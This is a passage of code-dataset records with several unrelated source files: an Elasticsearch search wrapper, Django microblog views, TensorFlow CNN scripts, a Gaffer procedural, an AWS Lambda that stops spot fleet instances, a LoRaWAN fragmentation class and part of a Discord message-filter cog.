This makes it easier to work with the search results using\n standard data analysis techniques.\n\n Example usage:\n\n # Create a plaintext connection to the Elastic server, no authentication\n e = ElasticDF(url=\"http://localhost:9200\")\n\n # The same, but with SSL and authentication\n e = ElasticDF(url=\"https://localhost:9200\", ssl=True, username=\"myuser\",\n password=\"mypass\")\n\n # Fetch search results from an index or index pattern for the previous day\n df = e.search_df(lucene=\"item:5282 AND color:red\", index=\"myindex-*\", days=1)\n\n # The same, but do not flatten structures into individual columns.\n # This will result in each structure having a single column with a\n # JSON string describing the structure.\n df = e.search_df(lucene=\"item:5282 AND color:red\", index=\"myindex-*\", days=1,\n normalize=False)\n\n # A more complex example, showing how to set the Elastic document type,\n # use Python-style datetime objects to constrain the search to a certain\n # time period, and a user-defined field against which to do the time \n # comparisons.\n df = e.search_df(lucene=\"item:5285 AND color:red\", index=\"myindex-*\",\n doctype=\"doc\", date_field=\"mydate\",\n start_time=datetime.now() - timedelta(days=8),\n end_time=datetime.now() - timedelta(days=6))\n '''\n\n es_conn = None # The connection to the ES server\n\n def __init__(self, url=None, timeout=250, ssl=False, username=\"\", password=\"\", verify_certs=True, ca_certs=None):\n '''\n Create the ElasticDF object and log into the Elastic server.\n '''\n\n self.es_conn = Elasticsearch(\n url,\n timeout=timeout,\n use_ssl=ssl,\n verify_certs=verify_certs,\n ca_certs=ca_certs,\n http_auth=(username, password)\n )\n\n def search(self, lucene, index=\"*\", doctype=\"doc\", fields=None,\n date_field=\"@timestamp\", days=None, start_time=None,\n end_time=None):\n '''\n Search Elastic and return the results as a list of dicts.\n\n lucene: A string containing the Elastic search (e.g., 'item:5282 AND color:red')\n index: A string containing the index name to search, or an index name pattern\n if you want to search multiple indices (e.g., 'myindex' or 'myindex-*')\n doctype: The document type you are interested in.\n fields: A string containing a comma-separated list of field names to return.\n The default is to return all fields, but using this list you can\n select only certain fields, which may make things a bit faster.\n date_field: The name of the field used for date/time comparison.\n days: Search the past X days. If provided, this supersedes both start_time\n and end_time.\n start_time: A datetime() object representing the start of the search\n window. If used without end_time, the end of the search\n window is the current time.\n end_time: A datetime() object representing the end of the search window.\n If used without start_time, the search start will be the earliest\n time in the index.\n '''\n\n s = Search(using=self.es_conn, index=index, doc_type=doctype)\n\n s = s.query(\"query_string\", query=lucene)\n\n if fields:\n s = s.source(fields.split(','))\n\n # Add timestamp filters, if provided.
Days takes precedence over\n # use of either/both of start_time and end_time.\n # Note the weird unpacked dictionary syntax in the call to s.filter().\n # We have to do it this way because Python has an issue naming things\n # with \"@\" in them, but the default timestamp field in many ES servers is\n # \"@timestamp\".\n # ref: https://github.com/elastic/elasticsearch-dsl-py/blob/master/docs/search_dsl.rst\n if days:\n end = datetime.now()\n start = end - timedelta(days=days)\n s = s.filter('range', ** {date_field: {\"gte\": start, \"lte\": end}})\n elif start_time and not end_time:\n s = s.filter('range', ** {date_field: {\"gte\": start_time}})\n elif end_time and not start_time:\n s = s.filter('range', ** {date_field: {\"lte\": end_time}})\n elif start_time and end_time:\n s = s.filter('range', ** {date_field: {\"gte\": start_time, \"lte\": end_time}})\n\n # execute the search\n results = s.scan()\n\n for hit in results:\n yield hit.to_dict()\n\n def search_df(self, lucene, index=\"*\", doctype=\"doc\", fields=None, date_field=\"@timestamp\", days=None, start_time=None, end_time=None, normalize=True):\n '''\n Search Elastic and return the results as a Pandas DataFrame.\n\n lucene: A string containing the Elastic search (e.g., 'item:5282 AND color:red')\n index: A string containing the index name to search, or an index name pattern\n if you want to search multiple indices (e.g., 'myindex' or 'myindex-*')\n doctype: The document type you are interested in.\n fields: A string containing a comma-separated list of field names to return.\n The default is to return all fields, but using this list you can\n select only certain fields, which may make things a bit faster.\n date_field: The name of the field used for date/time comparison.\n days: Search the past X days. If provided, this supersedes both start_time\n and end_time.\n start_time: A datetime() object representing the start of the search\n window. If used without end_time, the end of the search\n window is the current time.\n end_time: A datetime() object representing the end of the search window.\n If used without start_time, the search start will be the earliest\n time in the index.\n normalize: If set to True, fields containing structures (i.e. subfields)\n will be flattened such that each field has its own column in\n the dataframe.
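(For example, json_normalize flattens a nested field such as {"geo": {"lat": 1.0}} into a dotted "geo.lat" column; the "geo" field here is only an illustration.)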
If False, there will be a single column for the\n structure, with a JSON string encoding all the contents.\n '''\n results = list()\n\n for hit in self.search(lucene=lucene, index=index, doctype=doctype,\n fields=fields, date_field=date_field, days=days,\n start_time=start_time, end_time=end_time):\n results.append(hit)\n\n if normalize:\n df = json_normalize(results)\n else:\n df = pd.DataFrame(results)\n\n return df\n","sub_path":"huntlib/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"224650979","text":"from django.contrib.auth.decorators import login_required\nfrom django.db.models import Count, Q, F\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\nfrom django.views.generic import ListView\nfrom django.views.generic.edit import FormMixin\nfrom likes.models import Reaction\nfrom mikroblog.forms import MicroPostForm\nfrom mikroblog.models import MicroPost\nfrom tag.forms import TagForm\nfrom tag.models import Tag\nfrom django.contrib import messages\n\n\nclass MicroPostListView(ListView, FormMixin):\n model = MicroPost\n template_name = 'microblog/microblog.html'\n context_object_name = 'posts'\n form_class = MicroPostForm\n paginate_by = 10\n\n def get_queryset(self):\n if self.request.user.is_authenticated:\n return MicroPost.objects.all().annotate(\n likes=Count('reactions', filter=Q(reactions__type=Reaction.Type.UPVOTE)),\n is_liked=Count('reactions', filter=Q(reactions__type=Reaction.Type.UPVOTE,\n reactions__owner=self.request.user))).order_by('-date_posted',\n 'likes')\n else:\n return MicroPost.objects.all().annotate(\n likes=Count('reactions', filter=Q(reactions__type=Reaction.Type.UPVOTE))).order_by('-date_posted',\n 'likes')\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n\n data['popular_tags'] = Tag.objects.all().annotate(ilosc=Count('micro_posts')).order_by('-ilosc')[:20]\n data['popular_posts'] = MicroPost.objects.all().annotate(\n likes=Count('reactions', filter=Q(reactions__type=Reaction.Type.UPVOTE)))\n\n data['micro_post_form'] = MicroPostForm(initial={'author': self.request.user.id})\n data['tags_form'] = TagForm()\n\n return data\n\n def post(self, request, *args, **kwargs):\n form = self.get_form(MicroPostForm)\n tag_form = self.get_form(TagForm)\n if form.is_valid() & tag_form.is_valid():\n micropost = form.save()\n tags_data = tag_form.cleaned_data['word'].split(',')\n for word in tags_data:\n used_tag = Tag.objects.filter(word=word)\n if used_tag.exists():\n micropost.tag.add(used_tag[0])\n else:\n tag = Tag.objects.create(word=word)\n micropost.tag.add(tag)\n return super(MicroPostListView, self).form_valid(form)\n\n def get_success_url(self):\n return reverse('mikroblog')\n\n\n@login_required\ndef micro_post_delete(request, pk):\n micro_post = get_object_or_404(MicroPost, pk=pk)\n micro_post.delete()\n messages.warning(request, 'The post has been deleted!')\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required\ndef micro_post_like(request, pk):\n micro_post = get_object_or_404(MicroPost, pk=pk)\n type = Reaction.Type.UPVOTE\n like, created = Reaction.objects.get_or_create(micro_post=micro_post, owner=request.user, type=type)\n if not created:\n like.delete()\n else:\n like.save()\n return
HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n","sub_path":"socialNewsApp/src/mikroblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"335317678","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom nets import nets_factory\nimport argparse\nimport os.path\nimport re\nimport sys\nimport tarfile\nimport numpy as np\nfrom six.moves import urllib\nimport tensorflow as tf\nimport pandas as pd\nimport time\nimport cv2\nfrom preprocessing import preprocessing_factory\n\ntf.app.flags.DEFINE_string(\n 'checkpoint_path', '/tmp/tfmodel/',\n 'The directory where the model was written to or an absolute path to a '\n 'checkpoint file.')\ntf.app.flags.DEFINE_string(\n 'test_dir', '.', 'Test image directory.')\ntf.app.flags.DEFINE_string(\n 'preprocessing_name', None, 'The name of the preprocessing to use. If left '\n 'as `None`, then the model_name flag is used.')\ntf.app.flags.DEFINE_string(\n 'model_name', 'inception_v4', 'The name of the architecture to evaluate.')\nFLAGS = tf.app.flags.FLAGS\n# NOTE: unused helper; it references FLAGS.model_path, which is not defined above.\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n # Creates graph from saved graph_def.pb.\n with tf.gfile.FastGFile(FLAGS.model_path, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\ndef preprocess_for_eval(image, height, width,\n central_fraction=0.875, scope=None):\n with tf.name_scope(scope, 'eval_image', [image, height, width]):\n if image.dtype != tf.float32:\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n # Crop the central region of the image with an area containing 87.5% of\n # the original image.\n if central_fraction:\n image = tf.image.central_crop(image, central_fraction=central_fraction)\n\n if height and width:\n # Resize the image to the specified height and width.\n image = tf.expand_dims(image, 0)\n image = tf.image.resize_bilinear(image, [height, width],\n align_corners=False)\n image = tf.squeeze(image, [0])\n image = tf.subtract(image, 0.5)\n image = tf.multiply(image, 2.0)\n return image\n\ndef main(_):\n imn=[]\n label=[]\n \n with tf.Graph().as_default():\n \n \n network_fn = nets_factory.get_network_fn(FLAGS.model_name,num_classes=5,is_training=False)\n preprocessing_name = FLAGS.preprocessing_name or FLAGS.model_name\n image_preprocessing_fn = preprocessing_factory.get_preprocessing(preprocessing_name,is_training=False)\n \n if tf.gfile.IsDirectory(FLAGS.checkpoint_path):\n checkpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_path)\n else:\n checkpoint_path = FLAGS.checkpoint_path\n batch_size = 16\n tensor_input = tf.placeholder(tf.float32, [None, 299, 299, 3])\n logits, _ = network_fn(tensor_input)\n logits = tf.nn.top_k(logits, 1)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n rootpath = \"your_path\"  # placeholder path, matching the \"your_path\" used for csvpath below\n test_ids=os.listdir(rootpath)\n tot = len(test_ids)\n \n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n saver.restore(sess, checkpoint_path)\n for idx in range(0, tot, batch_size):\n images = list()\n idx_end = min(tot, idx + batch_size)\n print(idx)\n for i in range(idx, idx_end):\n image_id = test_ids[i]\n imn.append(test_ids[i])\n test_path =
os.path.join(FLAGS.test_dir, image_id)\n \n image = open(test_path, 'rb').read()\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n processed_image = image_preprocessing_fn(image, 299, 299)\n \n processed_image = tf.subtract(image, 0.5)\n processed_image = tf.multiply(processed_image, 2.0)\n processed_image = sess.run(processed_image)\n images.append(processed_image)\n images = np.array(images)\n predictions = sess.run(logits, feed_dict = {tensor_input : images}).indices\n label.extend(predictions)\n \n csvpath=\"your_path\"+'test.csv'\n dataframe = pd.DataFrame({'filenames':imn,'labels':label})\n dataframe.to_csv(csvpath,sep=',') \nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"batch_test.py","file_name":"batch_test.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"597407238","text":"##########################################################################\n#\n# Copyright (c) 2012, John Haddon. All rights reserved.\n# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n#\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n#\n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\nfrom __future__ import with_statement\n\nimport IECore\n\nimport Gaffer\nimport GafferScene\n\nclass ScriptProcedural( IECore.ParameterisedProcedural ) :\n\n\tdef __init__( self ) :\n\n\t\tIECore.ParameterisedProcedural.__init__( self, \"Generates geometry from a node within a .gfr script.\" )\n\n\t\tself.parameters().addParameters(\n\n\t\t\t[\n\n\t\t\t\tIECore.FileNameParameter(\n\t\t\t\t\tname = \"fileName\",\n\t\t\t\t\tdescription = \"The gaffer script which contains a scene to generate geometry from.\",\n\t\t\t\t\tallowEmptyString = False,\n\t\t\t\t\tcheck = IECore.FileNameParameter.CheckType.MustExist,\n\t\t\t\t\textensions = \"gfr\",\n\t\t\t\t),\n\n\t\t\t\tIECore.StringParameter(\n\t\t\t\t\tname = \"node\",\n\t\t\t\t\tdescription = \"The node to generate geometry from.\",\n\t\t\t\t\tdefaultValue = \"\",\n\t\t\t\t),\n\n\t\t\t\tIECore.FloatParameter(\n\t\t\t\t\tname = \"frame\",\n\t\t\t\t\tdescription = \"The frame to generate geometry at.\",\n\t\t\t\t\tdefaultValue = 1,\n\t\t\t\t),\n\n\t\t\t\tIECore.StringVectorParameter(\n\t\t\t\t\tname = \"context\",\n\t\t\t\t\tdescription = \"Additional context entries to be used during rendering.\",\n\t\t\t\t\tdefaultValue = IECore.StringVectorData( [] ),\n\t\t\t\t\tuserData = {\n\t\t\t\t\t\t\"parser\" : {\n\t\t\t\t\t\t\t\"acceptFlags\" : IECore.BoolData( True ),\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t),\n\n\t\t\t]\n\n\t\t)\n\n\t\tself.__currentFileName = None\n\n\tdef doBound( self, args ) :\n\n\t\tplug, context = self.__plugAndContext( args )\n\t\tif plug is None :\n\t\t\treturn IECore.Box3f()\n\n\t\tsceneProcedural = GafferScene.SceneProcedural( plug, context, \"/\" )\n\t\treturn sceneProcedural.bound()\n\n\tdef doRender( self, renderer, args ) :\n\n\t\tplug, context = self.__plugAndContext( args )\n\t\tif plug is None :\n\t\t\treturn\n\n\t\tself.__postExpansionCacheClearConnection = GafferScene.SceneProcedural.allRenderedSignal().connect( Gaffer.WeakMethod( self.__allRendered ) )\n\t\t\n\t\tsceneProcedural = GafferScene.SceneProcedural( plug, context, \"/\" )\n\t\trenderer.procedural( sceneProcedural )\n\n\tdef __allRendered( self ):\n\t\t\n\t\t# all the procedural expansion's done, so lets clear the value plug cache/object pool to free up a bit of memory:\n\t\tself.__postExpansionCacheClearConnection = None\n\n\t\tIECore.ObjectPool.defaultObjectPool().clear()\n\t\tmemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()\n\t\tGaffer.ValuePlug.setCacheMemoryLimit( 0 )\n\t\tGaffer.ValuePlug.setCacheMemoryLimit( memoryLimit )\n\n\tdef __plugAndContext( self, args ) :\n\n\t\tif args[\"fileName\"].value != self.__currentFileName :\n\n\t\t\tif args[\"fileName\"].value == \"\" :\n\t\t\t\tself.__scriptNode = None\n\t\t\telse :\n\t\t\t\tself.__scriptNode = Gaffer.ScriptNode()\n\t\t\t\tself.__scriptNode[\"fileName\"].setValue( args[\"fileName\"].value )\n\t\t\t\tself.__scriptNode.load( continueOnError = True )\n\t\t\t\tself.__currentFileName = 
args[\"fileName\"].value\n\n\t\tif self.__scriptNode is None :\n\t\t\treturn None, None\n\n\t\tif not args[\"node\"].value :\n\t\t\treturn None, None\n\n\t\tnode = self.__scriptNode.descendant( args[\"node\"].value )\n\n\t\tcontext = Gaffer.Context( self.__scriptNode.context() )\n\t\tcontext.setFrame( args[\"frame\"].value )\n\n\t\tfor i in range( 0, len(args[\"context\"]), 2 ) :\n\t\t\tentry = args[\"context\"][i].lstrip( \"-\" )\n\t\t\tcontext[entry] = eval( args[\"context\"][i+1] )\n\n\t\treturn node[\"out\"], context\n\nIECore.registerRunTimeTyped( ScriptProcedural, typeName = \"GafferScene::ScriptProcedural\" )\n","sub_path":"python/GafferScene/ScriptProcedural.py","file_name":"ScriptProcedural.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"481117111","text":"#*************************************************\n# lambda_function.lambda_handler\n# recuedas necesitas permisos sobre el lambda startInstance y stopInstance\n#*************************************************\nimport boto3\n\nimport json\nregion = 'us-east-1'\n\ndef lambda_handler(event, context):\n ec2 = boto3.client('ec2', region_name=region)\n ec2.modify_spot_fleet_request( SpotFleetRequestId='sfr-1111111-1111-1111-1111-111111111111',\n TargetCapacity=0)\n return {\n 'statusCode': 200,\n 'body': json.dumps('stop your instances: ')\n }\n\n","sub_path":"LambdaAndSpotFleet/Spot_stop_instances.py","file_name":"Spot_stop_instances.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602293102","text":"\nimport numpy as np\nimport tensorflow as tf\nimport tensorboard\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import preprocessing\n\n\nTrain_labels = np.loadtxt(\"./train_labels\")\nTrain_data = np.loadtxt(\"./train_data\")\nTrain_data = np.reshape(Train_data,(8546,10,10,3))\nTrain_labels = np.reshape(Train_labels,(8546,6))\n\nTest_labels = np.loadtxt(\"./test_labels\")\nTest_data = np.loadtxt(\"./test_data\")\nTest_data = np.reshape(Test_data,(2248,10,10,3))\nTest_labels = np.reshape(Test_labels,(2248,6))\n\ninput_height = 10\ninput_width = 10\nnum_labels = 6\nnum_channels = 3\n\nbatch_size = 10\nkernel_size = 60\ndepth = 60\nnum_hidden = 1000\n\nlearning_rate = 0.00001\ntraining_epochs = 10000\n\n#def CNN(input_tensor, train, regularizer):\ndef CNN(input_tensor, train):\n with tf.variable_scope('layer1-conv1'):\n conv1_weights = tf.get_variable(\"weight\",[3,3,3,60],initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv1_biases = tf.get_variable(\"bias\",[60],initializer=tf.constant_initializer(0.0))\n conv1 = tf.nn.conv2d(input_tensor, conv1_weights, strides=[1,1,1,1],padding='SAME')\n relu1 = tf.nn.relu(tf.nn.bias_add(conv1, conv1_biases))\n with tf.name_scope('layer2-pool1'):\n pool1 = tf.nn.max_pool(relu1, ksize=[1,2,2,1],strides=[1,1,1,1],padding=\"SAME\")\n print(pool1.shape)\n with tf.variable_scope('layer3-conv2'):\n conv2_weights = tf.get_variable(\"weight\",[5,5,60,10],initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv2_biases = tf.get_variable(\"bias\",[10],initializer=tf.constant_initializer(0.0))\n conv2 = tf.nn.conv2d(pool1, conv2_weights, strides=[1,1,1,1],padding='VALID')\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, conv2_biases))\n with tf.variable_scope('layer4-fc1'):\n pool_shape = relu2.get_shape().as_list()\n nodes = 
pool_shape[1] * pool_shape[2] * pool_shape[3]\n reshaped = tf.reshape(relu2, [-1, nodes])\n print(\"nodes:\", nodes)\n\n fc1_weights = tf.get_variable(\"weight\",[nodes,1000],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('loss', regularizer(fc1_weights))\n fc1_biases = tf.get_variable(\"bias\", [1000], initializer=tf.constant_initializer(0.1))\n fc1 = tf.nn.tanh(tf.matmul(reshaped, fc1_weights) + fc1_biases)\n if train:\n fc1 = tf.nn.dropout(fc1, 0.5)\n with tf.variable_scope('layer5-fc2'):\n fc2_weights = tf.get_variable(\"weight\", [1000,6],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('loss', regularizer(fc2_weights))\n fc2_biases = tf.get_variable(\"bias\", [6], initializer=tf.constant_initializer(0.1))\n logits = tf.nn.softmax(tf.matmul(fc1, fc2_weights) + fc2_biases)\n return logits\n\nX = tf.placeholder(tf.float32, shape=[None,input_height,input_width,num_channels])\nY = tf.placeholder(tf.float32, shape=[None,num_labels])\ntf.summary.image('input',Train_data, 20)\nregularizer = tf.contrib.layers.l2_regularizer(0.1)\ny_ = CNN(X,False)\n#loss = -tf.reduce_sum(Y*tf.log(y_))\nloss = tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(labels=Y,logits=y_))\n#tf.summary.scalar('loss', loss)\n\n#loss = tf.nn.softmax_cross_entropy_with_logits(labels=Y,logits=y_)\n#global_step = tf.Variable(0)\n\n\n#loss=tf.reduce_mean(tf.reduce_sum(tf.square(y_ - Y)))\n#optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n#learning_rate = tf.train.exponential_decay(0.01, global_step, 1, 0.9, staircase=True)\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss)\ncorrect_prediction = tf.equal(tf.argmax(y_, 1), tf.argmax(Y, 1))\n\n\n\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\ntf.summary.scalar('accuracy', accuracy)\nwith tf.Session() as session:\n tf.initialize_all_variables().run()\n merged = tf.summary.merge_all()\n #train_writer = tf.summary.FileWriter('./train', session.graph)\n #test_writer = tf.summary.FileWriter('./test')\n for i in range(training_epochs):\n #start = (epoch * 60) % 6000\n #end = min(start+60, 6000)\n _, tra_, losss = session.run([optimizer, accuracy, loss], feed_dict={X: Train_data, Y: Train_labels})\n #train_writer.add_summary(summary, epoch)\n _, y_pred, testa = session.run([optimizer, y_, accuracy], feed_dict={X: Test_data, Y: Test_labels})\n #test_writer.add_summary(summary, epoch)\n if(i%10 ==0): \n y_pred = np.argmax(y_pred, 1)\n y_true = np.argmax(Test_labels, 1)\n C=confusion_matrix(y_true, y_pred)\n print(C)\n print(classification_report(y_true, y_pred))\n\n print (\"step %d, \\tTrain: %g, \\tTest: %g ce=%g.\"%(i, tra_, testa, losss))\n #print(\"Epoch: \", epoch, \"Loss:\", losss, \" Training Accuracy: \",tra_, \"Testing:\", testa)\n #print(\"Epoch: \", epoch, \" Training Accuracy: \",session.run(accuracy, feed_dict={X: Train_data, Y: Train_labels}))\n #print(\"Testing Accuracy:\", session.run(accuracy, feed_dict={X: Test_data, Y: Test_labels}))\n","sub_path":"WISDM_ar_v1.1/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"74841471","text":"import math\nfrom os import urandom\nfrom bitstring import Bits\nfrom FRCommon import FRModes as Modes\nfrom FRCommon import lsb_mask\nfrom FRCommon import take_field_from_fragment\nfrom FRTile import FRTile as Tile\nfrom 
FRProfile import FRProfile as Profile\nfrom uCRC32 import CRC32\n\n\nclass FRPacket:\n\n def __init__(self):\n self.packet = None\n self.tiles = []\n self.packet_padding = None\n self.last_tile_padding = None\n self.MIC = None\n return\n\n def set_packet(self, packet):\n self.packet = packet\n return\n\n def set_tiles(self, tiles):\n self.tiles = tiles.copy()\n return\n\n def get_packet(self):\n return self.packet\n\n def random_generate(self, length_in_bytes):\n self.packet = urandom(length_in_bytes)\n return\n\n def set_padding(self, bits):\n self.last_tile_padding = bits\n if bits == 0:\n self.packet_padding = bytes(0)\n else:\n self.packet_padding = bytes(1)\n\n def calculate_mic(self, profile):\n if profile.mic_algo == 'CRC32':\n self.MIC = CRC32().calc(self.packet + self.packet_padding)\n return\n\n def get_tiles(self, profile: Profile, tile_len: int):\n if profile.mode == Modes.NO_ACK:\n return self.no_ack_get_tiles(tile_len, profile.l2_word_size)\n elif profile.mode == Modes.ALWAYS_ACK:\n return self.always_ack_get_tiles(tile_len, profile.l2_word_size)\n elif profile.mode == Modes.ACK_ON_ERROR:\n return self.ack_on_error_get_tiles(tile_len, profile.penultimate_tile_smaller, profile.l2_word_size)\n\n def no_ack_get_tiles(self, tile_len, l2_size=8):\n return self.always_ack_get_tiles(tile_len, l2_size)\n\n def ack_on_error_get_tiles(self, tile_len, penultimate_tile_small=False, l2_size=8):\n return\n\n def always_ack_get_tiles(self, tile_len, l2_size=8):\n packet_bits = len(self.packet)*8\n max_tiles = 0\n # Get number of tiles\n if tile_len < l2_size:\n print(\"## Tile length must be equal or greater than L2 size word =\", l2_size)\n else:\n remainder_tile = 0\n if packet_bits % tile_len > 0:\n remainder_tile = 1\n max_tiles = math.floor(packet_bits / tile_len) + remainder_tile\n # Get tiles\n packet_bits_left = packet_bits\n all_tiles = []\n tile = None\n octet_bits_left = 8\n octet_index = 0\n while packet_bits_left > 0:\n tile, packet_bits_left, octet_index, octet_bits_left = take_field_from_fragment(tile_len,\n self.packet,\n packet_bits_left,\n octet_index,\n octet_bits_left)\n all_tiles.append(tile)\n if len(all_tiles) != max_tiles:\n print(\"## Error in number of Tiles created\")\n else:\n self.tiles = all_tiles\n print(\"## Tiles created\")\n return max_tiles\n\n def construct_from_tiles(self, all_tiles):\n tiles_number = len(all_tiles)\n packet = Bits(0)\n for tiles_index in range(0, tiles_number):\n packet = packet + all_tiles[tiles_index].get_bits()\n self.packet = packet.tobytes()\n self.tiles = all_tiles\n return\n\n def add_window_to_packet(self, window):\n index = len(window) - 1\n while index >= 0:\n if window[index] is not None:\n self.tiles.append(window[index])\n index -= 1\n return\n\n","sub_path":"LoRaWAN_Fragmentation/FRPacket.py","file_name":"FRPacket.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"613146770","text":"\"\"\"\nMIT License\nCopyright (c) 2020 GamingGeek\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software\nand associated documentation files (the \"Software\"), to deal in the Software without restriction,\nincluding without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\n\nThe above copyright notice and this permission notice 
shall be included in all copies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE\nFOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\nWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n\nfrom discord.ext import commands\nfrom contextlib import suppress\nimport functools\nimport traceback\nimport asyncio\nimport discord\nimport re\n\n\nclass Message(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n        self.raidmsgs = {}\n        self.msgraiders = {}\n        self.dupecheck = {}\n        self.uuidregex = r\"[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}\"\n\n    def uuidgobyebye(self, text: str):\n        return re.sub(self.uuidregex, '', text, 0, re.MULTILINE)\n\n    async def safe_exc(self, coro, *args, **kwargs):\n        try:\n            await coro(*args, **kwargs)\n        except Exception:\n            pass\n\n    @commands.Cog.listener()\n    async def on_message(self, message):\n        if not isinstance(message.author, discord.Member):\n            return\n        if message.author.bot:\n            return\n        if self.bot.configs[message.guild.id].get('mod.dupecheck'):\n            lastmsg = self.uuidgobyebye(self.dupecheck.get(message.author.id, 'send this message and it will get yeeted'))\n            thismsg = self.uuidgobyebye(message.content)\n            excluded = self.bot.configs[message.guild.id].get('excluded.filter')\n            roleids = [r.id for r in message.author.roles]\n            if message.author.id not in excluded and not any(r in excluded for r in roleids) and message.channel.id not in excluded:\n                if message.content != \"\" and len(message.attachments) < 1 and not message.author.bot:\n                    if thismsg == lastmsg and not message.author.permissions_in(message.channel).manage_messages:\n                        await message.delete()\n            self.dupecheck[message.author.id] = message.content\n        premium = self.bot.premiumGuilds\n        if message.guild and message.guild.id in premium:\n            raidmsg = self.raidmsgs.get(message.guild.id, False)\n            if raidmsg and raidmsg in message.content:\n                # setdefault stores the list on the dict; .get() with a default would append to a throwaway list.\n                self.msgraiders.setdefault(message.guild.id, []).append(message.author)\n        excluded = self.bot.configs[message.guild.id].get('excluded.filter')\n        roleids = [r.id for r in message.author.roles]\n        if message.author.id not in excluded and not any(r in excluded for r in roleids) and message.channel.id not in excluded:\n            filters = self.bot.get_cog('Filters')\n            # with 